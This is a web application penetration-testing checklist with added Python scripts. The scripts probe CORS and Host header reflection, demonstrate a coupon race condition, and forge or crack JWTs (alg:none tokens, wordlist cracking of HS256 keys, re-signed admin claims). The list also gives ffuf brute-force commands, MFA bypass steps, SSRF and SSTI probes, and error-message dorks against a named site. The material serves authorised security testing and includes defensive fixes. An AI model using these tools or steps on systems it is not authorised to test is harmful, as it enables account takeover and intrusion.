- Fuzz the Application
- Use testssl.sh to look for SSL/TLS issues and vulnerabilities (weak ciphers, old protocol versions, certificate problems)
- Run Nikto & Nuclei, Dirsearch.py, BlackWidow on the target
- Check if the application uses AngularJS
- Note the version and look up its known vulnerabilities
- Check for a Content Security Policy (missing header, or weak sources such as unsafe-inline and wildcards)
- Check for Cross Origin Resource Sharing
- Change the Origin header domain and see if it is reflected in Access-Control-Allow-Origin, and whether Access-Control-Allow-Credentials: true comes with it
- Origin: somerandomdomain.com
- Add multiple Origin headers and see the response
- Add a port, special characters, or a null origin to it and observe the changes
- Look for Host Header Injection attacks
- Add an extra Host header
- Add an X-Forwarded-For: somerandomdomain.com header (and X-Forwarded-Host) and see if it is reflected or not
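The Origin and Host header probes above, as an added example that is not part of the original checklist. It sends the headers exactly as listed (duplicates included) using http.client rather than a higher-level library, grades the CORS response, and reports where an injected host name comes back. The target URL, host name target.example and the canary somerandomdomain.com are placeholders; the grading functions run offline on a captured response.

```python
"""Added example (not part of the original checklist): probe CORS handling
and Host/X-Forwarded-* reflection with raw, exactly-controlled headers.
Target host name and URL are placeholders; somerandomdomain.com is the
attacker-side canary used in the checklist."""
import http.client
import ssl
import sys
from urllib.parse import urlsplit

CANARY = "somerandomdomain.com"  # attacker-controlled host name


def origin_variants(host):
    """Origin values worth one request each: a foreign domain, null,
    the real host with a port, and prefix/suffix/special-char bypasses
    of a sloppy allow-list match."""
    return [
        f"https://{CANARY}",          # plain reflection of any origin?
        "null",                       # sandboxed iframe / file: origin
        f"https://{host}:8443",       # is the port checked?
        f"https://{host}.{CANARY}",   # startswith(host) match
        f"https://evil{host}",        # endswith(host) match
        f"https://{host}_.{CANARY}",  # special char some browsers accept in host names
    ]


def classify_cors(sent_origin, resp_headers):
    """Grade one Origin probe from the response headers (keys lower-cased).
    Returns None when the origin was not echoed."""
    acao = resp_headers.get("access-control-allow-origin")
    acac = resp_headers.get("access-control-allow-credentials", "").lower() == "true"
    if acao == sent_origin:
        # Reflected origin plus credentials lets an attacker page read
        # authenticated responses; without credentials only public data leaks.
        return {"origin": sent_origin, "issue": "origin reflected",
                "severity": "high" if acac else "low"}
    if acao == "*":
        return {"origin": sent_origin, "issue": "wildcard ACAO", "severity": "low"}
    return None


def find_reflections(canary, resp_headers, body):
    """Where did the injected host name land? Location/Link/Set-Cookie headers
    matter for reset-link poisoning and redirects, the body for cache poisoning."""
    hits = [f"header {name}" for name, value in resp_headers.items() if canary in value]
    if canary in body:
        hits.append("body")
    return hits


def probe(url, headers, timeout=10):
    """Send GET with the headers exactly as listed (duplicates included, since
    we write them ourselves) and return (status, lower-cased header dict, body)."""
    u = urlsplit(url)
    path = (u.path or "/") + (f"?{u.query}" if u.query else "")
    if u.scheme == "https":
        conn = http.client.HTTPSConnection(u.hostname, u.port, timeout=timeout,
                                           context=ssl._create_unverified_context())
    else:
        conn = http.client.HTTPConnection(u.hostname, u.port, timeout=timeout)
    conn.putrequest("GET", path, skip_host=True, skip_accept_encoding=True)
    for name, value in headers:
        conn.putheader(name, value)
    conn.endheaders()
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    hdrs = {}
    for name, value in resp.getheaders():
        key = name.lower()
        hdrs[key] = f"{hdrs[key]}, {value}" if key in hdrs else value
    conn.close()
    return resp.status, hdrs, body


def run_checks(url):
    host = urlsplit(url).hostname
    findings = []
    for origin in origin_variants(host):
        _, hdrs, _ = probe(url, [("Host", host), ("Origin", origin)])
        finding = classify_cors(origin, hdrs)
        if finding:
            findings.append(finding)
    # Two Origin headers in one request: does the parser take the first or the last?
    _, hdrs, _ = probe(url, [("Host", host), ("Origin", f"https://{host}"), ("Origin", f"https://{CANARY}")])
    finding = classify_cors(f"https://{CANARY}", hdrs)
    if finding:
        findings.append(dict(finding, issue="second Origin header reflected"))
    host_probes = {
        "Host replaced": [("Host", CANARY)],
        "duplicate Host": [("Host", host), ("Host", CANARY)],
        "X-Forwarded-Host": [("Host", host), ("X-Forwarded-Host", CANARY)],
        "X-Forwarded-For": [("Host", host), ("X-Forwarded-For", CANARY)],
    }
    for label, hdrs_to_send in host_probes.items():
        status, hdrs, body = probe(url, hdrs_to_send)
        hits = find_reflections(CANARY, hdrs, body)
        if hits:
            findings.append({"probe": label, "status": status, "reflected_in": hits})
    return findings


if __name__ == "__main__":
    for f in run_checks(sys.argv[1] if len(sys.argv) > 1 else "http://target.example/"):
        print(f)
```

A reflected origin is only a high finding when Access-Control-Allow-Credentials: true accompanies it; a bare wildcard cannot be combined with credentials by browsers. For the Host probes, a canary in the Location header or in absolute URLs in the body is what turns into password-reset poisoning or cache poisoning in the later checklist items.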
- Look for cached responses (filter for the keyword "Cache" in the Burp HTTP history); web cache poisoning might be possible
- Check whether the HttpOnly and Secure flags are set on cookies, and whether HSTS is enabled
- Check if .git exists and see if you can use https://github.com/arthaud/git-dumper
- Brute force credentials using Burp or ffuf (put the keyword "FUZZ" wherever you want to fuzz; you can use one or more fuzz positions, and filter the noise by response code or size)
- ffuf -request req.txt -request-proto http -w wordlist.txt
- ffuf -request req.txt -request-proto http -mode clusterbomb -w user.txt:FUZZUSER -w pass.txt:FUZZPASS
- If MFA is enabled, try to bypass it
- by removing the OTP parameter from the request
- by skipping the OTP step entirely and sending the post-MFA request directly
- Check the OTP timeout
- Check whether an already-used OTP is accepted again
- Brute force the OTP
- Check how many OTP attempts are allowed (rate limiting / lockout)
- Check if one account's MFA code can be used on another account
- If there is any payment involved --> try race conditions (send the same request many times in parallel: double spend, coupon reuse, balance checks)
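The race condition behind coupon reuse and double spend, as an added example that is not part of the original checklist. It uses an in-process toy coupon service (constructed here) so it runs offline: the vulnerable version reads and writes with a simulated database round trip in between, the safe version does both under one lock, and fire_parallel() is the "release everything at once" pattern used to trigger it. In an engagement the same fire_parallel() would drive an HTTP session against the real endpoint.

```python
"""Added example (not part of the original checklist): the check-then-act
race behind double-spend / coupon-reuse bugs, shown on an in-process toy
service, plus the parallel-fire pattern used to trigger it."""
import threading
import time


class VulnerableCoupon:
    """Single-use coupon whose read and write are separated by a 'database
    round trip' (simulated with sleep). Every request that reads before the
    first write succeeds."""

    def __init__(self):
        self.used = False
        self.credits = 0

    def redeem(self):
        if self.used:            # 1. read current state
            return False
        time.sleep(0.1)          # 2. latency window: other requests read here too
        self.used = True         # 3. write
        self.credits += 10
        return True


class SafeCoupon(VulnerableCoupon):
    """Same logic, but check and write happen under one lock. In a real
    backend this is a row lock (SELECT ... FOR UPDATE) or an atomic
    UPDATE coupons SET used=1 WHERE id=? AND used=0 whose row count decides."""

    def __init__(self):
        super().__init__()
        self._lock = threading.Lock()

    def redeem(self):
        with self._lock:
            return super().redeem()


def fire_parallel(fn, n=20):
    """Run fn in n threads released simultaneously (the same idea as sending a
    Burp Repeater group in parallel) and return how many calls reported success."""
    gate = threading.Barrier(n)
    results = [None] * n

    def worker(i):
        gate.wait()              # everyone arrives, then all fire at once
        results[i] = fn()

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results.count(True)


if __name__ == "__main__":
    v, s = VulnerableCoupon(), SafeCoupon()
    print("vulnerable: redeemed", fire_parallel(v.redeem), "times, credits", v.credits)
    print("safe:       redeemed", fire_parallel(s.redeem), "times, credits", s.credits)
```

The vulnerable coupon redeems once per thread because all twenty reads happen inside the latency window before the first write; the safe one redeems exactly once. When testing a real endpoint, count the successful responses the same way and compare them with what the business logic should have allowed.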
- Log in as admin and as a low-privilege user and check for broken access control and IDOR using ZAP/Burp (replay the admin's requests with the low-privilege session)
- In Burp, filter the HTTP history to requests with parameters and compare the status codes between the two sessions
- Try sending all special characters as input and observe the response
- If a page stores input, try XSS (stored)
- SQL injection is possible on all parameters and headers, even Cookie and Referer
- If passwords or credit card numbers are displayed masked with asterisks ("*"),
- look at the raw responses in developer tools: the full value is often sent to the client and only hidden in the UI
- Look at client-side data (JSON files and responses) for plaintext sensitive data
- Check for JWT tokens
- Decode the JWT and change the alg to "none" (also try None/NONE) and drop the signature
- Change the claims in the JWT and see if the signature is actually validated
- Use the Burp JSON Web Tokens extension
- Use https://github.com/aress31/jwtcat to see if they are using a weak HMAC key
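The JWT checks above done by hand, as an added example that is not part of the original checklist or of jwtcat: decode, alg:none forgery, claim tampering, a wordlist attack on a weak HS256 key (the idea behind jwtcat), and a verifier written the way the server should do it. The sample token and the key "secret" are constructed here for the demonstration; only the standard library is used.

```python
"""Added example (not part of the original checklist): JWT decode, alg:none
forgery, claim tampering, weak-key cracking and a correct HS256 verifier,
standard library only. SAMPLE_TOKEN / SAMPLE_KEY are constructed test data."""
import base64
import hashlib
import hmac
import json

NONE_VARIANTS = ["none", "None", "NONE", "nOnE"]  # case variants some libraries accepted


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_jwt(token):
    """Split and decode without any verification, like a jwt.io decoder."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def sign_hs256(header, payload, key):
    signing_input = f"{_segment(header)}.{_segment(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_none(token, alg="none", **claim_changes):
    """Keep the header/payload, set alg to a 'none' variant, drop the signature,
    and change whatever claims you like (for example role='admin')."""
    header, payload, _ = decode_jwt(token)
    header["alg"] = alg
    payload.update(claim_changes)
    return f"{_segment(header)}.{_segment(payload)}."


def forge_with_key(token, key, **claim_changes):
    """Once the key is known, tampered claims get a valid signature."""
    header, payload, _ = decode_jwt(token)
    payload.update(claim_changes)
    return sign_hs256(header, payload, key)


def crack_hs256(token, candidates):
    """Offline wordlist attack: re-sign with each candidate key and compare."""
    signing_input, sig = token.rsplit(".", 1)
    target = b64url_decode(sig)
    for cand in candidates:
        key = cand.encode() if isinstance(cand, str) else cand
        if hmac.compare_digest(hmac.new(key, signing_input.encode(), hashlib.sha256).digest(), target):
            return key
    return None


def verify_hs256(token, key):
    """How the server should check: pin the algorithm (never trust the header's
    alg), compare signatures in constant time, only then use the claims."""
    header, payload, sig = decode_jwt(token)
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    signing_input = token.rsplit(".", 1)[0].encode()
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        raise ValueError("bad signature")
    return payload


def is_accepted(token, key):
    """True if verify_hs256() would let the token through (malformed tokens count as rejected)."""
    try:
        verify_hs256(token, key)
        return True
    except ValueError:
        return False


# Constructed sample: a token the target might issue, signed with a weak key
SAMPLE_KEY = b"secret"
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "role": "user"}, SAMPLE_KEY)

if __name__ == "__main__":
    print("claims:", decode_jwt(SAMPLE_TOKEN)[1])
    for alg in NONE_VARIANTS:
        print(f"alg={alg} admin token accepted:", is_accepted(forge_none(SAMPLE_TOKEN, alg=alg, role="admin"), SAMPLE_KEY))
    key = crack_hs256(SAMPLE_TOKEN, ["password", "123456", "secret", "changeme"])
    print("cracked key:", key)
    print("forged admin token accepted:", is_accepted(forge_with_key(SAMPLE_TOKEN, key, role="admin"), SAMPLE_KEY))
```

Against a real target, paste the captured token into forge_none() and replay it in Burp; if the tampered claims take effect, the server is honouring the header's alg. crack_hs256() is the same test jwtcat runs with a larger wordlist, and any hit means forge_with_key() produces tokens the server cannot distinguish from its own.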
- Check session vulnerabilities
- Take the user's session ID, log out, then send a request with the same session ID: it should have been invalidated server-side
- Check the password reset link --> request the email and open the link --> see if any external URLs (scripts, images, analytics) are loaded by that page --> check the Referer header sent to those domains --> see if the password reset token leaks in the Referer header
- Check parameter pollution --> add the same parameter twice with different values/IDs and see which one the backend uses
- `AutoComplete=off` --> credit card processing / password fields --> check whether the browser caches the card info after updating it on the website; it should not store the card info
- Inspect the form and see if AutoComplete=off is set on the form or the field
- Go to Developer Tools --> Application --> Storage --> Session Storage --> try updating the values and observe the difference
- Look for any documents available on the website and extract metadata using exiftool -a file.doc (author names, usernames, software versions)
- Check if the application parses or fetches URLs
- Try changing the URL in the parameter
- Try http://127.0.0.1 (and other internal addresses) to turn it into SSRF
- Send an overly long value in the parameter (buffer overflow / length handling)
- Check if it gives any useful error messages
- On password update or payment pages, check if CSRF is possible (no token, or the token is not validated)
- Check for SSTI using tplmap
python tplmap.py -u 'http://www.target.com/page?name=John'
- Look for obfuscated JS and decode it using de4js (JavaScript Deobfuscator and Unpacker)
- Check Google Dorks
- site:hackingdream.net AND intitle:"index of"
- site:hackingdream.net AND ("mysql error with query" OR "mysql_query" OR "mysqli_query" OR "pdo_mysql")
- site:hackingdream.net AND ("[Microsoft][ODBC SQL" OR "[SQL Server]")
- site:hackingdream.net AND ("PostgreSQL server: FATAL" OR "not a valid PostgreSQL result")
- site:hackingdream.net AND ("ORA-00933" OR "ORA-00921" OR "ORA-00936" OR "ORA-12541" OR "[ODBC SQL]")
More dorks here https://www.boxpiper.com/posts/google-dork-list-error-messages
- site:hackingdream.net AND (ext:"backup" OR ext:"bak" OR ext:"old")
- site:hackingdream.net AND intitle:"500"
- site:hackingdream.net AND (inurl:"api" OR inurl:"key" OR inurl:"apikey")
- site:hackingdream.net AND -inurl:"https"
- Books
Book of Tips
Zseano's Methodology
Bug Bounty Playbook
Bug Bounty Playbook 2